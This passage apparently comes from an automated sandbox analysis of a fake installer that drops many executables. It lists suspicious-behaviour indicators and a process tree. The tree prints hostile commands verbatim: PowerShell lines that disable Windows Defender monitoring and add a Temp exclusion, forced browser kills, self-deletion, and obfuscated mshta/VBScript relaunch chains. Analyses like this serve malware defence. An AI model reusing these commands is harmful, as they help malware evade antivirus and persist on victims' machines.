pid Process 368 powershell.exe 368 powershell.exe 600 powershell.exe 600 powershell.exe 600 powershell.exe 368 powershell.exe 2300 Mon17a0d8ec302e.exe 2300 Mon17a0d8ec302e.exe 3988 Mon17bbf11fdb575d.tmp 3988 Mon17bbf11fdb575d.tmp 368 powershell.exe 600 powershell.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe 944 Mon178e7a516181.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2580 Explorer.EXE 4944 foldershare.exe -
Suspicious behavior: MapViewOfSection 51 IoCs
pid Process 2300 Mon17a0d8ec302e.exe 5200 pQnAbYmg3ChB2IJbQyaavv5U.exe 5200 pQnAbYmg3ChB2IJbQyaavv5U.exe 5200 pQnAbYmg3ChB2IJbQyaavv5U.exe 5376 BRFaifqDEarEZCox1Bk4206c.exe 5376 BRFaifqDEarEZCox1Bk4206c.exe 5376 BRFaifqDEarEZCox1Bk4206c.exe 5764 Zz_Kz0VjFFF_1CMdwOqI2jwN.exe 6072 cscript.exe 6072 cscript.exe 7564 jxI5xrUu3jnl7Xc0smG8sEXe.exe 6072 cscript.exe 6072 cscript.exe 6072 cscript.exe 6072 cscript.exe 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 7288 Process not Found 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 7604 bwgirdw 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 6660 bwgirdw 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 5400 bwgirdw 1188 MicrosoftEdgeCP.exe 1188 MicrosoftEdgeCP.exe 7604 bwgirdw 2548 MicrosoftEdgeCP.exe 2548 MicrosoftEdgeCP.exe 2548 MicrosoftEdgeCP.exe 2548 MicrosoftEdgeCP.exe 2884 MicrosoftEdgeCP.exe 2884 MicrosoftEdgeCP.exe 7208 bwgirdw 8444 bwgirdw 8396 bwgirdw 2884 MicrosoftEdgeCP.exe 2884 MicrosoftEdgeCP.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
pid Process 4120 671081.exe 7280 cli.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 1048 Mon17870faab0.exe Token: SeAssignPrimaryTokenPrivilege 1048 Mon17870faab0.exe Token: SeLockMemoryPrivilege 1048 Mon17870faab0.exe Token: SeIncreaseQuotaPrivilege 1048 Mon17870faab0.exe Token: SeMachineAccountPrivilege 1048 Mon17870faab0.exe Token: SeTcbPrivilege 1048 Mon17870faab0.exe Token: SeSecurityPrivilege 1048 Mon17870faab0.exe Token: SeTakeOwnershipPrivilege 1048 Mon17870faab0.exe Token: SeLoadDriverPrivilege 1048 Mon17870faab0.exe Token: SeSystemProfilePrivilege 1048 Mon17870faab0.exe Token: SeSystemtimePrivilege 1048 Mon17870faab0.exe Token: SeProfSingleProcessPrivilege 1048 Mon17870faab0.exe Token: SeIncBasePriorityPrivilege 1048 Mon17870faab0.exe Token: SeCreatePagefilePrivilege 1048 Mon17870faab0.exe Token: SeCreatePermanentPrivilege 1048 Mon17870faab0.exe Token: SeBackupPrivilege 1048 Mon17870faab0.exe Token: SeRestorePrivilege 1048 Mon17870faab0.exe Token: SeShutdownPrivilege 1048 Mon17870faab0.exe Token: SeDebugPrivilege 1048 Mon17870faab0.exe Token: SeAuditPrivilege 1048 Mon17870faab0.exe Token: SeSystemEnvironmentPrivilege 1048 Mon17870faab0.exe Token: SeChangeNotifyPrivilege 1048 Mon17870faab0.exe Token: SeRemoteShutdownPrivilege 1048 Mon17870faab0.exe Token: SeUndockPrivilege 1048 Mon17870faab0.exe Token: SeSyncAgentPrivilege 1048 Mon17870faab0.exe Token: SeEnableDelegationPrivilege 1048 Mon17870faab0.exe Token: SeManageVolumePrivilege 1048 Mon17870faab0.exe Token: SeImpersonatePrivilege 1048 Mon17870faab0.exe Token: SeCreateGlobalPrivilege 1048 Mon17870faab0.exe Token: 31 1048 Mon17870faab0.exe Token: 32 1048 Mon17870faab0.exe Token: 33 1048 Mon17870faab0.exe Token: 34 1048 Mon17870faab0.exe Token: 35 1048 Mon17870faab0.exe Token: SeDebugPrivilege 1552 Mon178d8e5d06822.exe Token: SeDebugPrivilege 2288 Mon17332e41e6b.exe Token: SeDebugPrivilege 600 powershell.exe Token: SeDebugPrivilege 368 powershell.exe Token: SeRestorePrivilege 4288 WerFault.exe Token: SeBackupPrivilege 4288 WerFault.exe Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeDebugPrivilege 4288 WerFault.exe Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeShutdownPrivilege 2580 Explorer.EXE Token: SeCreatePagefilePrivilege 2580 Explorer.EXE Token: SeDebugPrivilege 4452 DownFlSetup110.exe Token: SeDebugPrivilege 4796 chrome.exe Token: SeDebugPrivilege 4968 chrome2.exe Token: SeDebugPrivilege 4816 WerFault.exe Token: SeDebugPrivilege 5068 WerFault.exe Token: SeDebugPrivilege 4916 taskkill.exe Token: SeDebugPrivilege 4712 chrome3.exe Token: SeDebugPrivilege 4828 WerFault.exe Token: SeShutdownPrivilege 2580 Explorer.EXE -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 3988 Mon17bbf11fdb575d.tmp 2580 Explorer.EXE 2580 Explorer.EXE 7880 installer.exe 2580 Explorer.EXE 2580 Explorer.EXE 1416 Calculator.exe 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 5480 installer.exe 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE 2580 Explorer.EXE -
Suspicious use of SetWindowsHookEx 19 IoCs
pid Process 2580 Explorer.EXE 8008 MicrosoftEdge.exe 6644 MicrosoftEdgeCP.exe 7420 MicrosoftEdge.exe 1076 MicrosoftEdgeCP.exe 1076 MicrosoftEdgeCP.exe 1168 MicrosoftEdge.exe 7000 MicrosoftEdgeCP.exe 7000 MicrosoftEdgeCP.exe 7972 MicrosoftEdge.exe 1188 MicrosoftEdgeCP.exe 1188 MicrosoftEdgeCP.exe 9164 MicrosoftEdge.exe 2548 MicrosoftEdgeCP.exe 2548 MicrosoftEdgeCP.exe 4260 MicrosoftEdge.exe 2884 MicrosoftEdgeCP.exe 2884 MicrosoftEdgeCP.exe 5960 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2868 wrote to memory of 700 2868 setup_x86_x64_install.exe 69 PID 2868 wrote to memory of 700 2868 setup_x86_x64_install.exe 69 PID 2868 wrote to memory of 700 2868 setup_x86_x64_install.exe 69 PID 700 wrote to memory of 3852 700 setup_installer.exe 70 PID 700 wrote to memory of 3852 700 setup_installer.exe 70 PID 700 wrote to memory of 3852 700 setup_installer.exe 70 PID 3852 wrote to memory of 3172 3852 setup_install.exe 73 PID 3852 wrote to memory of 3172 3852 setup_install.exe 73 PID 3852 wrote to memory of 3172 3852 setup_install.exe 73 PID 3852 wrote to memory of 4064 3852 setup_install.exe 74 PID 3852 wrote to memory of 4064 3852 setup_install.exe 74 PID 3852 wrote to memory of 4064 3852 setup_install.exe 74 PID 3852 wrote to memory of 1912 3852 setup_install.exe 75 PID 3852 wrote to memory of 1912 3852 setup_install.exe 75 PID 3852 wrote to memory of 1912 3852 setup_install.exe 75 PID 3852 wrote to memory of 392 3852 setup_install.exe 80 PID 3852 wrote to memory of 392 3852 setup_install.exe 80 PID 3852 wrote to memory of 392 3852 setup_install.exe 80 PID 3852 wrote to memory of 3040 3852 setup_install.exe 76 PID 3852 wrote to memory of 3040 3852 setup_install.exe 76 PID 3852 wrote to memory of 3040 3852 setup_install.exe 76 PID 3852 wrote to memory of 2760 3852 setup_install.exe 79 PID 3852 wrote to memory of 2760 3852 setup_install.exe 79 PID 3852 wrote to memory of 2760 3852 setup_install.exe 79 PID 3852 wrote to memory of 2036 3852 setup_install.exe 78 PID 3852 wrote to memory of 2036 3852 setup_install.exe 78 PID 3852 wrote to memory of 2036 3852 setup_install.exe 78 PID 4064 wrote to memory of 600 4064 cmd.exe 77 PID 4064 wrote to memory of 600 4064 cmd.exe 77 PID 4064 wrote to memory of 600 4064 cmd.exe 77 PID 3172 wrote to memory of 368 3172 cmd.exe 82 PID 3172 wrote to memory of 368 3172 cmd.exe 82 PID 3172 wrote to memory of 368 3172 cmd.exe 82 PID 3852 wrote to memory of 364 3852 setup_install.exe 81 PID 3852 wrote to memory of 364 3852 setup_install.exe 81 PID 3852 wrote to memory of 364 3852 setup_install.exe 81 PID 3852 wrote to memory of 676 3852 setup_install.exe 83 PID 3852 wrote to memory of 676 3852 setup_install.exe 83 PID 3852 wrote to memory of 676 3852 setup_install.exe 83 PID 3852 wrote to memory of 1076 3852 setup_install.exe 110 PID 3852 wrote to memory of 1076 3852 setup_install.exe 110 PID 3852 wrote to memory of 1076 3852 setup_install.exe 110 PID 3852 wrote to memory of 3944 3852 setup_install.exe 84 PID 3852 wrote to memory of 3944 3852 setup_install.exe 84 PID 3852 wrote to memory of 3944 3852 setup_install.exe 84 PID 3852 wrote to memory of 1744 3852 setup_install.exe 88 PID 3852 wrote to memory of 1744 3852 setup_install.exe 88 PID 3852 wrote to memory of 1744 3852 setup_install.exe 88 PID 392 wrote to memory of 944 392 cmd.exe 87 PID 392 wrote to memory of 944 392 cmd.exe 87 PID 392 wrote to memory of 944 392 cmd.exe 87 PID 676 wrote to memory of 884 676 cmd.exe 86 PID 676 wrote to memory of 884 676 cmd.exe 86 PID 676 wrote to memory of 884 676 cmd.exe 86 PID 3852 wrote to memory of 344 3852 setup_install.exe 85 PID 3852 wrote to memory of 344 3852 setup_install.exe 85 PID 3852 wrote to memory of 344 3852 setup_install.exe 85 PID 1912 wrote to memory of 1048 1912 cmd.exe 109 PID 1912 wrote to memory of 1048 1912 cmd.exe 109 PID 1912 wrote to memory of 1048 1912 cmd.exe 109 PID 3852 wrote to memory of 1320 3852 setup_install.exe 89 PID 3852 wrote to memory of 1320 3852 setup_install.exe 89 PID 3852 wrote to memory of 1320 3852 setup_install.exe 89 PID 3852 wrote to memory of 1424 3852 setup_install.exe 90 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer cscript.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:348
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2504
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2836
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2796
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
PID:2736 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:5300
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2580 -
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17870faab0.exe5⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17870faab0.exeMon17870faab0.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1048 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:7840
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:4512
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe5⤵PID:3040
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exeMon175e6c8b40064b8c8.exe6⤵
- Executes dropped EXE
PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon173a360b525.exe5⤵PID:2036
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon173a360b525.exeMon173a360b525.exe6⤵
- Executes dropped EXE
PID:3096 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6831137645.exe"7⤵PID:4552
-
C:\Users\Admin\AppData\Local\Temp\6831137645.exe"C:\Users\Admin\AppData\Local\Temp\6831137645.exe"8⤵
- Executes dropped EXE
PID:2432
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1607525511.exe"7⤵PID:2920
-
C:\Users\Admin\AppData\Local\Temp\1607525511.exe"C:\Users\Admin\AppData\Local\Temp\1607525511.exe"8⤵PID:4464
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Mon173a360b525.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon173a360b525.exe" & exit7⤵PID:4364
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Mon173a360b525.exe" /f8⤵
- Kills process with taskkill
PID:8140
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone5⤵PID:2760
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bffc2992eb3d.exeMon17bffc2992eb3d.exe /mixone6⤵
- Executes dropped EXE
PID:1520 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 6647⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 6807⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 6367⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 7327⤵
- Program crash
PID:4672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 8847⤵
- Program crash
PID:4580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 9287⤵
- Program crash
PID:5980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 11047⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4892
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178e7a516181.exe5⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon178e7a516181.exeMon178e7a516181.exe6⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:944 -
C:\Users\Admin\Pictures\Adobe Films\KWw_Na9PoK6E2at8khQXjitr.exe"C:\Users\Admin\Pictures\Adobe Films\KWw_Na9PoK6E2at8khQXjitr.exe"7⤵
- Executes dropped EXE
PID:516
-
-
C:\Users\Admin\Pictures\Adobe Films\8t8B84uCRSWE3mwZuTRWxKhE.exe"C:\Users\Admin\Pictures\Adobe Films\8t8B84uCRSWE3mwZuTRWxKhE.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5292 -
C:\Users\Admin\AppData\Local\Temp\cli.exe"C:\Users\Admin\AppData\Local\Temp\cli.exe"8⤵
- Suspicious behavior: SetClipboardViewer
PID:7280
-
-
-
C:\Users\Admin\Pictures\Adobe Films\UDl5MrZhovzJ9aalPEClXxwq.exe"C:\Users\Admin\Pictures\Adobe Films\UDl5MrZhovzJ9aalPEClXxwq.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:5284 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:5512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 4928⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4496
-
-
-
C:\Users\Admin\Pictures\Adobe Films\6Dc4QkJcH_bc6k4XPPf58CgI.exe"C:\Users\Admin\Pictures\Adobe Films\6Dc4QkJcH_bc6k4XPPf58CgI.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5276
-
-
C:\Users\Admin\Pictures\Adobe Films\zOSiw22fXWUlLyCSO8v9nq6z.exe"C:\Users\Admin\Pictures\Adobe Films\zOSiw22fXWUlLyCSO8v9nq6z.exe"7⤵
- Executes dropped EXE
PID:5228
-
-
C:\Users\Admin\Pictures\Adobe Films\W30vm3LUtOHOLL7zBnVYdAYg.exe"C:\Users\Admin\Pictures\Adobe Films\W30vm3LUtOHOLL7zBnVYdAYg.exe"7⤵
- Executes dropped EXE
PID:5216
-
-
C:\Users\Admin\Pictures\Adobe Films\maDKjDOdzVgHa7Y8JpsfZClW.exe"C:\Users\Admin\Pictures\Adobe Films\maDKjDOdzVgHa7Y8JpsfZClW.exe"7⤵PID:5208
-
-
C:\Users\Admin\Pictures\Adobe Films\pQnAbYmg3ChB2IJbQyaavv5U.exe"C:\Users\Admin\Pictures\Adobe Films\pQnAbYmg3ChB2IJbQyaavv5U.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5200
-
-
C:\Users\Admin\Pictures\Adobe Films\7lIFfIAq75ayPS1l79AzqZbx.exe"C:\Users\Admin\Pictures\Adobe Films\7lIFfIAq75ayPS1l79AzqZbx.exe"7⤵PID:5192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 6728⤵
- Program crash
PID:4996
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xR3OQ2Qh_z7R_Ve5A7amjTnU.exe"C:\Users\Admin\Pictures\Adobe Films\xR3OQ2Qh_z7R_Ve5A7amjTnU.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5184 -
C:\Users\Admin\Pictures\Adobe Films\xR3OQ2Qh_z7R_Ve5A7amjTnU.exe"C:\Users\Admin\Pictures\Adobe Films\xR3OQ2Qh_z7R_Ve5A7amjTnU.exe"8⤵PID:3456
-
-
-
C:\Users\Admin\Pictures\Adobe Films\AAsjqRognrs5OHbgENK9auj7.exe"C:\Users\Admin\Pictures\Adobe Films\AAsjqRognrs5OHbgENK9auj7.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5176 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵PID:3500
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Checks whether UAC is enabled
PID:4196
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cewNSWFaXogGyGjuphJS2DKK.exe"C:\Users\Admin\Pictures\Adobe Films\cewNSWFaXogGyGjuphJS2DKK.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5168
-
-
C:\Users\Admin\Pictures\Adobe Films\8NH7scC85tXvro4oKnjmDNxQ.exe"C:\Users\Admin\Pictures\Adobe Films\8NH7scC85tXvro4oKnjmDNxQ.exe"7⤵PID:4524
-
-
C:\Users\Admin\Pictures\Adobe Films\xiByWaoG_7rk4c36MvEOU6HY.exe"C:\Users\Admin\Pictures\Adobe Films\xiByWaoG_7rk4c36MvEOU6HY.exe"7⤵PID:4588
-
C:\Users\Admin\Documents\UWZiUOJl0LZG66f2pahI0uWq.exe"C:\Users\Admin\Documents\UWZiUOJl0LZG66f2pahI0uWq.exe"8⤵
- Checks computer location settings
PID:7348 -
C:\Users\Admin\Pictures\Adobe Films\Ilaefr1v7j44DGPNmdV_RRvT.exe"C:\Users\Admin\Pictures\Adobe Films\Ilaefr1v7j44DGPNmdV_RRvT.exe"9⤵PID:4652
-
-
C:\Users\Admin\Pictures\Adobe Films\imO0ZiS9oGLwhNVBuuZbV1xs.exe"C:\Users\Admin\Pictures\Adobe Films\imO0ZiS9oGLwhNVBuuZbV1xs.exe"9⤵PID:4908
-
-
C:\Users\Admin\Pictures\Adobe Films\uPYxRNAxSvxSHV00bS0YeTvO.exe"C:\Users\Admin\Pictures\Adobe Films\uPYxRNAxSvxSHV00bS0YeTvO.exe"9⤵PID:596
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:6560
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Executes dropped EXE
- Kills process with taskkill
PID:5368
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\jxI5xrUu3jnl7Xc0smG8sEXe.exe"C:\Users\Admin\Pictures\Adobe Films\jxI5xrUu3jnl7Xc0smG8sEXe.exe"9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7564
-
-
C:\Users\Admin\Pictures\Adobe Films\bAIBrcCy3xrVuiQu8gXHl3jY.exe"C:\Users\Admin\Pictures\Adobe Films\bAIBrcCy3xrVuiQu8gXHl3jY.exe"9⤵PID:2976
-
-
C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"9⤵PID:5828
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵PID:7484
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe" ) do taskkill -f -iM "%~NxM"11⤵PID:196
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi12⤵PID:6696
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )13⤵PID:7420
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"14⤵PID:7820
-
-
-
